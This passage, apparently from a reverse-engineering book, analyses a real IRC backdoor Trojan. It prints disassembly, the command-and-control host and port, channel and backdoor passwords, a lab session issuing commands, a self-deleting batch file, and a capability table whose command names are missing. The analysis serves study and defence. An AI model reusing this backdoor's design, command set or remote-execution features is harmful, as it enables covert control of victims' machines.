004026FF PUSH ZoneLock.0040553D ; format = "qwer%s" 00402704 LEA EAX,DWORD PTR SS:[EBP-29C] 0040270A PUSH EAX ; s 0040270B CALL <JMP.&CRTDLL.sprintf> 00402710 ADD ESP,0C 00402713 PUSH 5 ; IsShown = 5 00402715 PUSH 0 ; DefDir = NULL 00402717 LEA EAX,DWORD PTR SS:[EBP-29C] 0040271D PUSH EAX ; Parameters 0040271E PUSH ZoneLock.00404010 ; FileName = "C:\WINNT\system32" 00402723 PUSH ZoneLock.00405696 ; Operation = "open" 00402728 PUSH 0 ; hWnd = NULL 0040272A CALL <JMP.&SHELL32.ShellExecuteA> 0040272F PUSH 0 ; ExitCode = 0 00402731 CALL <JMP.&KERNEL32.ExitProcess> 00402736 CALL <JMP.&KERNEL32.GetCommandLineA> 0040273B PUSH ZoneLock.00405538 ; s2 = "qwer" 00402740 PUSH EAX ; s1 00402741 CALL <JMP.&CRTDLL.strstr> 00402746 ADD ESP,8 00402749 MOV ESI,EAX 0040274B OR ESI,ESI 0040274D JE SHORT ZoneLock.00402775 0040274F MOV ECX,ESI 00402751 OR EAX,FFFFFFFF 00402754 INC EAX 00402755 CMP BYTE PTR DS:[ECX+EAX],0 00402759 JNZ SHORT ZoneLock.00402754 0040275B CMP EAX,8 0040275E JBE SHORT ZoneLock.00402775 00402760 PUSH 7D0 ; Timeout = 2000. ms 00402765 CALL <JMP.&KERNEL32.Sleep> 0040276A MOV EAX,ESI 0040276C ADD EAX,4 0040276F PUSH EAX ; FileName 00402770 CALL <JMP.&KERNEL32.DeleteFileA> 00402775 PUSH ZoneLock.004050A3 ; MutexName = "botsmfdutpex" 0040277A PUSH 1 ; InitialOwner = TRUE 0040277C PUSH 0 ; pSecurity = NULL 0040277E CALL <JMP.&KERNEL32.CreateMutexA> 00402783 MOV DWORD PTR DS:[404650],EAX 00402788 CALL <JMP.&KERNEL32.GetLastError> 0040278D CMP EAX,0B7 00402792 JNZ SHORT ZoneLock.0040279B 00402794 PUSH 0 ; ExitCode = 0 00402796 CALL <JMP.&KERNEL32.ExitProcess>
When the program is first launched, it runs some checks to see whether it has already been installed, and if not it installs itself. This is done by calling GetModuleFileName to obtain the primary executable's file name, and checking whether the system's SYSTEM32 directory name is part of the path. If the program has not yet been installed, it proceeds to copy itself to the SYSTEM32 directory under the name ZoneLockup.exe, launches that executable, and terminates itself by calling ExitProcess.
The new instance of the process is obviously going to run this exact same code, except this time the SYSTEM32 check will find that the program is already running from SYSTEM32 and will wind up running the code at 00402736. This sequence checks whether this is the first time that the program is launched from its permanent habitat. This is done by checking a special flag qwer set in the command-line parameters that also includes the full path and name of the original Trojan executable that was launched (This is going to be something like Webcam Shots.scr). The program needs this information so that it can delete this file—there is no reason to keep the original executable in place after the ZoneLockup.exe is created and launched.
If you're wondering why this file name was passed into the new instance instead of just deleting it in the previous instance, there is a simple answer: It wouldn't have been possible to delete the executable while the program was still running, because Windows locks executable files while they are loaded into memory. The program had to launch a new instance, terminate the first one, and delete the original file from this new instance.
The function proceeds to create a mutex called botsmfdutpex, whatever that means. The purpose of this mutex is to make sure no other instances of the program are already running; the program terminates if the mutex already exists. This mechanism ensures that the program doesn't try to infect the same host twice.
The next part of this function is a bit too long to print here, but it's easily readable: It collects several bits of information regarding the host, including the exact version of the operating system, and the currently logged-on user. This is followed by what is essentially the program's main loop, which is printed in Listing 8.4.
Example 8.4. The Backdoor program's primary network connection check loop.
00402939 /PUSH 00040293B |LEA EAX,DWORD PTR SS:[EBP-4] 0040293E |PUSH EAX 0040293F |CALL <JMP.&WININET.InternetGetConnectedState> 00402944 |OR EAX,EAX
00402946 |JNZ SHORT ZoneLock.00402954 00402948 |PUSH 7530 ; Timeout = 30000. ms 0040294D |CALL <JMP.&KERNEL32.Sleep> 00402952 |JMP SHORT ZoneLock.0040299A 00402954 |CMP DWORD PTR DS:[EDI*4+405104],0 0040295C |JNZ SHORT ZoneLock.00402960 0040295E |XOR EDI,EDI 00402960 |PUSH DWORD PTR DS:[EDI*4+40510C] 00402967 |PUSH DWORD PTR DS:[EDI*4+405104] 0040296E |CALL ZoneLock.004029B1 00402973 |ADD ESP,8 00402976 |MOV ESI,EAX 00402978 |CMP ESI,1 0040297B |JNZ SHORT ZoneLock.0040298A 0040297D |PUSH DWORD PTR DS:[40464C] ; Timeout = 0. ms 00402983 |CALL <JMP.&KERNEL32.Sleep> 00402988 |JMP SHORT ZoneLock.00402990 0040298A |CMP ESI,3 0040298D |JE SHORT ZoneLock.0040299C 0040298F |INC EDI 00402990 |PUSH 1388 ; /Timeout = 5000. ms 00402995 |CALL <JMP.&KERNEL32.Sleep> 0040299A \JMP SHORT ZoneLock.00402939
The first thing you'll notice about the this code sequence is that it is a loop, probably coded as an infinite loop (such as a while(1) statement). In its first phase, the loop repeatedly calls the InternetGetConnectedState API and sleeps for 30 seconds if the API returns FALSE. As you've probably guessed, the InternetGetConnectedState API checks whether the computer is currently connected to the Internet. In reality, this API only checks whether the system has a valid IP address—it doesn't really check that it is connected to the Internet. It looks as if the program is checking for a network connection and is simply waiting for the system to become connected if it's not already connected.
Once the connection check succeeds, the function calls another function, 004029B1, with the first parameter being a pointer to the hard-coded string g.hackarmy.tk, and with the second parameter being 0x1A0B (6667 in decimal). This function immediately calls into a function at 0040129C, which calls the gethostbyname WinSock2 function on that g.hackarmy.tk string, and proceeds to call the connect function to connect to that address. The port number is set to the value from the second parameter passed earlier: 6667. In case you're not sure what this port number is used for, a quick trip to the IANA Web site (the Internet Assigned Numbers Authority) at www.iana.org shows that ports 6665 through 6669 are registered for IRCU, the Internet Relay Chat services.
It looks like the Trojan is looking to chat with someone. Care to guess with whom? Here's a hint: he's wearing a black hat. Well, at least in security book illustrations he does, it's actually more likely that he's just a bored teenager wearing a baseball cap. Regardless, the program is clearly trying to connect to an IRC server in order to communicate with an attacker who is most likely its original author. The specific address being referenced is g.hackarmy.tk, which was invalid at the time of writing (and is most likely going to remain invalid). This address was probably unregistered very early on, as soon as the antivirus companies discovered that it was being used for backdoor access to infected machines. You can safely assume that this address originally pointed to some IRC server, either one set up specifically for this purpose or one of the many legitimate public servers.
To really test the Trojan's backdoor capabilities, I set up an IRC server on a separate virtual machine and named it g.hackarmy.tk, so that the Trojan connects to it when it is launched. You're welcome to try this out if you want, but you're probably going to learn plenty by just reading through my accounts of this experience. To make this reversing session truly effective, I was combining a conventional reversing session with some live chats with the backdoor through IRC.
Stepping through the code that follows the connection of the socket, you can see a function that seems somewhat interesting and unusual, shown in Listing 8.5.
Example 8.5. A random string-generation function.
004014EC PUSH EBP 004014ED MOV EBP,ESP 004014EF PUSH EBX 004014F0 PUSH ESI 004014F1 PUSH EDI 004014F2 CALL <JMP.&KERNEL32.GetTickCount> 004014F7 PUSH EAX ; seed 004014F8 CALL <JMP.&CRTDLL.srand> 004014FD POP ECX 004014FE CALL <JMP.&CRTDLL.rand> 00401503 MOV EDX,EAX 00401505 AND EDX,80000003 0040150B JGE SHORT ZoneLock.00401512 0040150D DEC EDX 0040150E OR EDX,FFFFFFFC 00401511 INC EDX 00401512 MOV EBX,EDX 00401514 ADD EBX,4 00401517 MOV ESI,0
0040151C JMP SHORT ZoneLock.00401535 0040151E CALL <JMP.&CRTDLL.rand> 00401523 MOV EDI,DWORD PTR SS:[EBP+8] 00401526 MOV ECX,1A 0040152B CDQ 0040152C IDIV ECX 0040152E ADD EDX,61 00401531 MOV BYTE PTR DS:[EDI+ESI],DL 00401534 INC ESI 00401535 CMP ESI,EBX 00401537 JLE SHORT ZoneLock.0040151E 00401539 MOV EAX,DWORD PTR SS:[EBP+8] 0040153C MOV BYTE PTR DS:[EAX+ESI],0 00401540 POP EDI 00401541 POP ESI 00401542 POP EBX 00401543 POP EBP 00401544 RETN
This generates some kind of random data (with the random seed taken from the current tick counter). The buffer length is somewhat random; the default length is 5 bytes, but it can go to anywhere from 2 to 8 bytes, depending on whether rand produces a negative or positive integer. Once the primary loop is entered, the function computes a random number for each byte, calculates a modulo 0x1A (26 in decimal) for each random number, adds 0x61 (97 in decimal), and stores the result in the current byte in the buffer.
Observing the resulting buffer in OllyDbg exposes that the program is essentially producing a short random string that is made up of lowercase letters, and that the string is placed inside the caller-supplied buffer.
Notice how the modulo in Listing 8.5 is computed using the highly ineffiecient IDIV instruction. This indicates that the Trojan was compiled with some kind of Minimize Size compiler option (assuming that it was written in a high-level language). If the compiler was aiming at generating high-performance code, it would have used reciprocal multiplication to compute the modulo, which would have produced far longer, yet faster code. This is not surprising considering that the program originally came packed with UPX—the author of this program was clearly aiming at making the executable as tiny as possible. For more information on how to identify optimized division sequences and other common arithmetic operations, refer to Appendix B.
The next sequence takes the random string and produces a string that is later sent to the IRC server. Let's take a look at that code.
00402ABB PUSH EAX ; <%s> 00402ABC PUSH ZoneLock.0040519E ; <%s> = "USER" 00402AC1 LEA EAX,DWORD PTR SS:[EBP-204] 00402AC7 PUSH EAX ; <%s> 00402AC8 PUSH ZoneLock.00405199 ; <%s> = "NICK" 00402ACD PUSH ZoneLock.004054C5 ; format = "%s %s %s %s "x.com" "x" :x" 00402AD2 LEA EAX,DWORD PTR SS:[EBP-508] 00402AD8 PUSH EAX ; s 00402AD9 CALL <JMP.&CRTDLL.sprintf>
Considering that EAX contains the address of the randomly generated string, you should now know exactly what that string is for: it is the user name the backdoor will be using when connecting to the server.
The preceding sequence produced the following message, and will always produce the same message—the only difference is going to be the randomly generated name string.
NICK vsorpy USER vsorpy "x.com" "x" :x
If you look at RFC 1459, the IRC protocol specifications, you can see that this string means that a new user called vsorpy is being registered with the server. This username is going to represent this particular system in the IRC chat. The random-naming scheme was probably created in order to enable multiple clients to connect to the same server without conflicts. The architecture actually supports convenient communication with multiple infected systems at the same time.
After connecting to the IRC server, the program and the IRC server enter into a brief round of standard IRC protocol communications that is just typical protocol handshaking. The next important even takes place when the IRC server notifies the client whether or not the server has a MOTD (Message of the Day) set up. Based on this information, the program enters into the code sequence that follows, which decides how to enter into the communications channels inside which the attacker will be communicating with the Backdoor.
00402D80 JBE SHORT ZoneLock.00402DA7 00402D82 PUSH ZoneLock.004050B6 ; <%s> = "grandad" 00402D87 PUSH ZoneLock.004050B0 ; <%s> = "##g##" 00402D8C PUSH ZoneLock.004051A3 ; <%s> = "JOIN" 00402D91 PUSH ZoneLock.004054AC ; format = "%s %s %s"
00402D96 LEA EAX,DWORD PTR SS:[EBP-260] 00402D9C PUSH EAX ; s 00402D9D CALL <JMP.&CRTDLL.sprintf> 00402DA2 ADD ESP,14 00402DA5 JMP SHORT ZoneLock.00402DC5 00402DA7 PUSH ZoneLock.004050B0 ; <%s> = "##g##" 00402DAC PUSH ZoneLock.004051A3 ; <%s> = "JOIN" 00402DB1 PUSH ZoneLock.004054BE ; format = "%s %s" 00402DB6 LEA EAX,DWORD PTR SS:[EBP-260] 00402DBC PUSH EAX ; s 00402DBD CALL <JMP.&CRTDLL.sprintf>
In the preceding sequence, the first sprintf will only be called if the server sends an MOTD, and the second one will be called if it doesn't. The two commands both join the same channel: ##g##, but if the server has an MOTD the channel will be joined with the password grandad. At this point, you can start your initial communications with the program by pretending to be the attacker and joining into a channel called ##g## on the private IRC server. As soon as you join, you will know that your friend is already there because other than your own nickname you can also see an additional random-sounding name that's connected to this channel. That's the Backdoor program.
It's obvious that the backdoor can be controlled by issuing commands inside of this private channel that you've established, but how can you know which commands are supported? If the information you've gathered so far could have been gathered using a simple network monitor, the list of supported commands couldn't have been. For this, you simply must look at the command-processing code and determine which commands our program supports.
In communicating with the backdoor, the most important code area is the one that processes private-message packets, because that's how the attacker controls the program: through private message. It is quite easy to locate the code in the program that checks for a case where the PRIVMSG command is sent from the server. This will be helpful because you're expecting the code that follows this check to contain the actual parsing of commands from the attacker. The code that follows contains the only direct reference in the program to the PRIVMSG string.
00402E82 PUSH DWORD PTR SS:[EBP-C] ; s2 00402E85 PUSH ZoneLock.0040518A ; s1 = "PRIVMSG" 00402E8A CALL <JMP.&CRTDLL.strcmp> ; strcmp 00402E8F ADD ESP,8 00402E92 OR EAX,EAX 00402E94 JNZ ZoneLock.00402F8F 00402E9A PUSH ZoneLock.004054A7 ; s2 = " :"
00402E9F MOV EAX,DWORD PTR SS:[EBP+8] ; 00402EA2 INC EAX ; 00402EA3 PUSH EAX ; s1 00402EA4 CALL <JMP.&CRTDLL.strstr> ; strstr 00402EA9 ADD ESP,8 00402EAC MOV EDX,EAX 00402EAE ADD EDX,2 00402EB1 MOV ESI,EDX 00402EB3 JNZ SHORT ZoneLock.00402EBC 00402EB5 XOR EAX,EAX 00402EB7 JMP ZoneLock.00403011 00402EBC MOVSX EAX,BYTE PTR DS:[ESI] 00402EBF MOVSX EDX,BYTE PTR DS:[4050C5] 00402EC6 CMP EAX,EDX 00402EC8 JE SHORT ZoneLock.00402ED1 00402ECA XOR EAX,EAX
After confirming that the command string is actually PRIVMSG, the program skips the colon character that denotes the beginning of the message (in the strstr call), and proceeds to compare the first character of the actual message with a character from 004050C5. When you look at that memory address in the debugger, you can see that it appears to contain a hard-coded exclamation mark (!) character. If the first character is not an exclamation mark, the program exits the function and goes back to wait for the next server transmission. So, it looks as if backdoor commands start with an exclamation mark. The next code sequence appears to perform another kind of check on your private messages. Let's take a look.
00402EED XOR EDI,EDI 00402EEF LEA EAX,DWORD PTR SS:[EBP-60] 00402EF2 PUSH EAX ; s2 00402EF3 IMUL EAX,EDI,50 ; 00402EF6 LEA EAX,DWORD PTR DS:[EAX+4051C5] ; 00402EFD PUSH EAX ; s1 00402EFE CALL <JMP.&CRTDLL.strcmp> ; strcmp 00402F03 ADD ESP,8 00402F06 OR EAX,EAX 00402F08 JNZ SHORT ZoneLock.00402F0D 00402F0A XOR EBX,EBX 00402F0C INC EBX 00402F0D INC EDI 00402F0E CMP EDI,3 00402F11 JLE SHORT ZoneLock.00402EEF
The preceding sequence is important: It compares a string from [EBP-60], which is the nickname of the user who's sending the current private message (essentially the attacker) with a string from a global variable. It also looks as if this is an array of strings, each element being up to 0x50 (80 in decimal) characters long. While I was first stepping through this sequence, all of these four strings were empty. This made the code proceed to the code sequence that follows instead of calling into a longish function at 00403016 that would have been called if there was a match on one of the usernames. Let's look at what the function does next (when the usernames don't match).
00402F29 PUSH ZoneLock.004050BE ; <%s> = "tounge" 00402F2E PUSH ZoneLock.00405110 ; <%s> = "morris" 00402F33 PUSH ZoneLock.004054A1 ; format = "%s %s" 00402F38 LEA EAX,DWORD PTR SS:[EBP-260] 00402F3E PUSH EAX ; s 00402F3F CALL <JMP.&CRTDLL.sprintf> 00402F44 LEA EAX,DWORD PTR SS:[EBP-260] 00402F4A PUSH EAX ; s2 00402F4B PUSH ESI ; s1 00402F4C CALL <JMP.&CRTDLL.strcmp>
This is an interesting sequence. The first part uses sprintf to produce the string morris tounge, which is then checked against the current message being processed. If there is a mismatch, the function performs one more check on the current command string (even though it's been confirmed to be PRIVMSG), and returns. If the current command is" !morris tounge", the program stores the originating username in the currently available slot on that string array from 004051C5. That is, upon receiving this Morris message, the program is storing the name of the user it's currently talking to in an array. This is the array that starts at 004051C5; the same array that was scanned for the attacker's name earlier. What does this tell you? It looks like the string !morris tounge is the secret password for the Backdoor program. It will only start processing commands from a user that has transmitted this particular message!
One unusual thing about the preceding code snippet that generates and checks whether this is the correct password is that the sprintf call seems to be redundant. Why not just call strcmp with a pointer to the full morris tounge string? Why construct it in runtime if it's a predefined, hard-coded string? A quick search for other references to this address shows that it is static; there doesn't seem to be any other place in the code that modifies this sequence in any way. Therefore, the only reason I can think of is that the author of this program didn't want the string "morris tounge" to actually appear in the program in one piece. If you look at the code snippet, you'll see that each of the words come from a different area in the program's data section. This is essentially a primitive antireversing scheme that's supposed to make it a bit more difficult to find the password string when searching through the program binary.
Now that we have the password, you can type it into our IRC program and try to establish a real communications channel with the backdoor. Obtaining a basic list of supported commands is going to be quite easy. I've already mentioned a routine at 00403016 that appears to process the supported commands. Disassembling this function to figure out the supported commands is an almost trivial task; one merely has to look for calls to string-comparison functions and examine the strings being compared. The function that does this is far too long to be included here, but let's take a look at a typical sequence that checks the incoming message.
0040308B PUSH ZoneLock.0040511B ; s2 = "?dontuseme" 00403090 LEA EAX,DWORD PTR SS:[EBP-200] 00403096 PUSH EAX ; s1 00403097 CALL <JMP.&CRTDLL.strcmp> 0040309C ADD ESP,8 0040309F OR EAX,EAX 004030A1 JNZ SHORT ZoneLock.004030B2 004030A3 CALL ZoneLock.00401AA0 004030A8 MOV EAX,3 004030AD JMP ZoneLock.00403640 004030B2 PUSH ZoneLock.00405126 ; s2 = "?quit" 004030B7 LEA EAX,DWORD PTR SS:[EBP-200] 004030BD PUSH EAX ; s1 004030BE CALL <JMP.&CRTDLL.strcmp> 004030C3 ADD ESP,8 004030C6 OR EAX,EAX 004030C8 JNZ SHORT ZoneLock.004030D4 004030CA MOV EAX,3 004030CF JMP ZoneLock.00403640 004030D4 PUSH ZoneLock.00405138 ; s2 = "threads" 004030D9 LEA EAX,DWORD PTR SS:[EBP-200] 004030DF PUSH EAX ; s1 004030E0 CALL <JMP.&CRTDLL.strcmp>
See my point? All three strings are compared against the string from [EBP-200]; that's the command string (not including the exclamation mark). There are quite a few string comparisons, and I won't go over the code that responds to each and every one of them. Instead, how about we try out a few of the more obvious ones and just see what happens? For instance, let's start with the !info command.
/JOIN ##g## <attacker> !morris tounge <attacker> !info -iyljuhn- Windows 2000 [Service Pack 4]. uptime: 0d 18h 11m. cpu 1648MHz. online: 0d 0h 0m. Current user: eldade. IP:192.168.11.128 Hostname:eldad-vm-2ksrv. Processor x86 Family 6 Model 9 Stepping 8, GenuineIntel.
You start out by joining the ##g## channel and saying the password. You then send the" !info" command, to which the program responds with some general information regarding the infected host. This includes the exact version of the running operating system (in my case, this was the version of the guest operating system running under VMWare, on which I installed the Trojan/backdoor), and other details such as estimated CPU speed and model number, IP address and system name, and so on.
There are plenty of other, far more interesting commands. For example, take a look at the" !webfind64" and the" !execute "commands. These two commands essentially give an attacker full control of the infected system." !execute" launches an executable from the infected host's local drives." !webfind64" downloads a file from any remote server into a local directory and launches it if needed. These two commands essentially give an attacker full-blown access to the infected system, and can be used to take advantage of the infected system in a countless number of ways.
There is one other significant command in the backdoor program that I haven't discussed yet:" !socks4". This command establishes a thread that waits for connections that use the SOCKS4 protocol. SOCKS4 is a well-known proxy communications protocol that can be used for indirectly accessing a network. Using SOCKS4, it is possible to route all traffic (for example, outgoing Internet traffic) through a single server.
The backdoor supports multiple SOCKS4 threads that listen to any traffic on attacker-supplied port numbers. What does this all mean? It means that if the infected system has any open ports on the Internet, it is possible to install a SOCKS4 server on one of those ports, and use that system to indirectly connect to the Internet. For attackers this can be heaven, because it allows them to anonymously connect to servers on the Internet (actually, it's not anonymous—it uses the legitimate system owner's identity, so it is essentially a type of identity theft). Such anonymous connections can be used for any purpose: Web browsing, e-mail, and so on. The ability to connect to other servers anonymously without exposing one's true identity creates endless criminal opportunities—it is going to be extremely difficult to trace back the actual system from which the traffic is originating. This is especially true if each individual proxy is only used for a brief period of time and if each proxy is cleaned up properly once it is decommissioned.
Speaking of cleaning up, this program supports a self-destruct command called" !?dontuseme", which uninstalls the program from the registry and deletes the executable. You can probably guess that this is not an entirely trivial task—an executable program file cannot be deleted while the program is running. In order to work around this problem, the program must generate a "self-destruct" batch file, which deletes the program's executable after the main program exits. This is done in a little function at 00401AA0, which generates the following batch file, called "rm.bat". The program runs this batch file and quits. Let's take a quick look at this batch file.
@echo off :start if not exist "C:\WINNT\SYSTEM32\ZoneLockup.exe" goto done del "C:\WINNT\SYSTEM32\ZoneLockup.exe" goto start :done del rm.bat
This batch file loops through code that attempts to delete the main program executable. The loop is only terminated once the executable is actually gone. That's because the batch file is going to start running while the ZoneLockup.exe executable is still running. The batch file must wait until ZoneLockup.exe is no longer running so that it can be deleted.
Having gathered all of this information, I realized that it would be a waste to not properly summarize it. This is an interesting program that reveals much about how modern-day malware works. The following table provides a listing of the supported commands I was able to find in the program along with their descriptions.
Table 8.1. List of supported commands in the Hackarmy Trojan/Backdoor program.
COMMAND | DESCRIPTION | ARGUMENTS |
|---|---|---|
| Instructs the program to self-destruct by removing its | |
| Initializes a SOCKS4 server thread on the specified port. This essentially turns the infected system into a proxy server. | Port number to open. |
| Lists the currently active server threads. | |
| Displays some generic information regarding the infected host, including its name, IP address, CPU model and speed, currently logged on username, and so on. | |
| Closes the backdoor process without uninstalling the program. It will be started again the next time the system boots. | |
| Causes the program to disconnect from the IRC server and wait for the specified number of minutes before attempting to reconnect. | Number of minutes to wait before attempting reconnection. |
| Executes a local binary. The program is launched in a hidden mode to keep the end user out of the loop... | Full path to executable file. |
| Deletes a file from the infected host. The program responds with a message notifying the attacker whether or not the operation was successful. | Full path to file being deleted. |
| Instructs the infected host to download a file from a remote server (using a specified protocol such as | URL of file being downloaded and local file name that will receive the downloaded file. |
| The strings for these two commands appear in the executable, and there is a function (at |
Malicious programs can be treacherous and complicated. They will do their best to be invisible and seem as innocent as possible. Educating end users on how these programs work and what to watch out for is critical, but it's not enough. Developers of applications and operating systems must constantly improve the way these programs handle untrusted code and convincingly convey to the users the fact that they simply shouldn't let an unknown program run on their system unless there's an excellent reason to do so.
In this chapter, you have learned a bit about malicious programs, how they work, and how they hide themselves from antivirus scanners. You also dissected a very typical real-world malicious program and analyzed its behavior, to gain a general idea of how these programs operate and what type of damage they inflict on infected systems.
Granted, most people wouldn't ever need to actually reverse engineer a malicious program. The developers of antivirus and other security software do an excellent job, and all that is necessary is to install the right security products and properly configure systems and networks for maximum security. Still, reversing malware can be seen as an excellent exercise in reverse engineering and as a solid introduction to malicious software.